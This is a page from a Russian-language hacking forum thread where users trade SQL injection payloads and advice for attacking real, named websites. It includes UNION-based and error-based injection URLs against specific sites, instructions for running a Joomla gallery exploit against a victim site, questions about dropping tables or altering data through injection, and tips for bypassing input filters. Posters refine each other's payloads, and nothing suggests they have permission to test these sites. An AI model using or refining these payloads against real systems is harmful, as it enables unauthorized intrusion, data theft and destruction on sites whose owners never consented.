Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 107 of 1207
  1. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    http://www.pconsult.dp.ua/index.php?pn=-1+union+select+1,2,3,4,5/*
    user()=pconsult_user@localhost
    database()=pconsult_db
    version()=4.1.21-standard-log
    Делал подбор перебором, но....глухо...
     
    #2121 На100ящий, 29 May 2008
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    На100ящий
    я вобше 4 версии не люблю..) заепывает искать))
     
    #2122 sabe, 29 May 2008
    Last edited: 30 May 2008
  3. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    есть вопрос про уязвимость в базе Oracle, при ошибке выдает:
    или
     
    #2123 sabe, 29 May 2008
  4. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Code:
    http://www.bmcc.cuny.edu/gallery/category.jsp?cat_id=1'+union+select+null,null,null,null,null,null,null,null,null,null+from+users--
    Вот тебе вариант хоть както работающего запроса, в таблице users 10 столбцов. Дальше сам.

    Твои ошибки - ты не закрыл кавычку рядом с ID, и в оракле комментарий начинающийся с /* должен обязательно закрываться при помощи */ поэтому следует использовать -- .
     
    #2124 Qwazar, 29 May 2008
    Last edited: 29 May 2008
    1 person likes this.
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Qwazar
    спс. есть))
     
    #2125 sabe, 29 May 2008
    Last edited: 30 May 2008
  6. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    Здравствуйте, подскажите пожалуйста, как быть, у меня есть эксплоит для Joomla DatsoGallery 1.6 Blind SQL Injection, чтобы его запустить в командной строке Windows с начало прописываю путь до php, а затем через пробел, путь до експлойта, я так понял два параметра последних не обязательны, ввожу имя сайта, а он выдает ошибку 404. Подскажите что я делаю не так и как лучше этот скрипт использовать?
    сам он тут - securitylab.ru/poc/extra/352779.php
     
    #2126 Spaise, 29 May 2008
  7. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Он запускается из браузера.
    Code:
    http://site.ru/datso_xpl.php?url=http://victim.com/joomla_path/
     
    _________________________
    #2127 +toxa+, 30 May 2008
    1 person likes this.
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    нащет удаления баз или таблиц, drop table?
    и как можно внести изменения в поле, insert into?

    можете навести пример или другие варианты..?
     
    #2128 sabe, 30 May 2008
    Last edited: 30 May 2008
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Если мускул, то никак. Нету разделения запросов. Если инъекция в селекте, то и будет выполнятся только селект.
     
    #2129 .Slip, 30 May 2008
  10. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    разделение запросов может быть если делать mysql_real_connect()

    Если инъекция в инсерте, то можно воспользоваться конструкцией INSERT ... ON DUPLICATE KEY UPDATE и провести апдейт нужной таблицы (при определённых обстоятельствах конечно)).
     
    _________________________
    #2130 +toxa+, 30 May 2008
    3 people like this.
  11. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    ок. спс за идеи) как нить реализую при определённых обстоятельствах..)
     
    #2131 sabe, 30 May 2008
  12. NAT_uu

    NAT_uu Elder - Старейшина

    Joined:
    31 Dec 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    сорри за тупой вопрос, тут есть скуля?
    PHP:
        $gname $_GET['n'];
        
        try{
                // 1) Get guild description
                $pdb dbLayer::getCharDB();
                $gname mysql_real_escape_string($gname); // SQL injection prevention
                $pdb->Execute("SELECT * FROM guilds WHERE guildName='$gname'");
            
            if( !(    $guild $pdb->Fetch()) ) throw new Exception('There is no guild "'.$gname.'" in database.');
     
    #2132 NAT_uu, 30 May 2008
  13. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    NAT_uu, экранирование кавычки есть и скуля есть, если ты сумеешь экранирование обойти.
     
    #2133 Lesnoy_chelovek, 30 May 2008
  14. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    чем можно заменить + или %20 и еще /**/ на что то другое?
     
    #2134 1SeTh, 30 May 2008
  15. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    union select null from blablabla
    И как тут делать mysql_real_connect() ? Что то я тебя понять не могу.
     
    #2135 .Slip, 30 May 2008
    Last edited: 30 May 2008
  16. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    %09, а вообще, почитай про "управляющие символы" здесь:
    http://ru.wikipedia.org/
     
    #2136 z3r0cool, 30 May 2008
    Last edited: 30 May 2008
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул
     
    #2137 diznt, 30 May 2008
  18. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    Используй ошибки для вывода данных.

    http://www.kdo.ru/article.asp?id=5709&cid=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
     
    #2138 z3r0cool, 30 May 2008
    2 people like this.
  19. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    ммммм.... Обчный МССкуль=)
    Code:
    http://www.kdo.ru/article.asp?id=5709&cid=1%20OR%201=@@version
    А на мой вопрос в этой теме так и не ответили((((
    ---
    Не успел отправить=)
     
    #2139 Dima-k17, 30 May 2008
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Очень интересно.Функция mysql_real_escape_string как раз и позволяет защититься от инъекции .Если есть способ обхода, хотелось бы увидеть
    2 NAT_uu ИМХО в этом скрипте инъекцию не проведёшь
     
    #2140 Kakoytoxaker, 30 May 2008
    1 person likes this.
(You must log in or sign up to post here.)
Page 107 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.